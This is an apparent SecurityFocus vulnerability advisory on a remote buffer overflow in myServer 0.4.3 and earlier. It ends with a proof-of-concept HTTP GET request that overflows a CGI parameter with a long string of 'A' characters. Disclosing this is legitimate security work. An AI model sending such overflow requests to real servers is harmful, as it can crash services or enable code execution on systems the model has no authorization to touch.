15 lines
No EOL
771 B
Text
15 lines
No EOL
771 B
Text
source: https://www.securityfocus.com/bid/8612/info
|
|
|
|
myServer has been reported prone to a remote buffer overflow vulnerability. It is possible to trigger this issue by sending overly long values for URI parameters.
|
|
|
|
Although unconfirmed, this vulnerability may be potentially exploited to execute attacker-supplied code with the privileges of the vulnerable web server.
|
|
|
|
This vulnerability was reported for myServer version 0.4.3 and earlier.
|
|
|
|
GET /cgi-bin/math_sum.mscgi?a=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
|
|
Accept: image/gif, image/x-xbitmap, image/jpeg, */*
|
|
Accept-Language: en-us
|
|
Accept-Encoding: gzip, deflate
|
|
User-Agent: Moozatech (compatible; Moozatech Scanner)
|
|
Host: 12.12.12.12
|
|
Connection: Keep-Alive |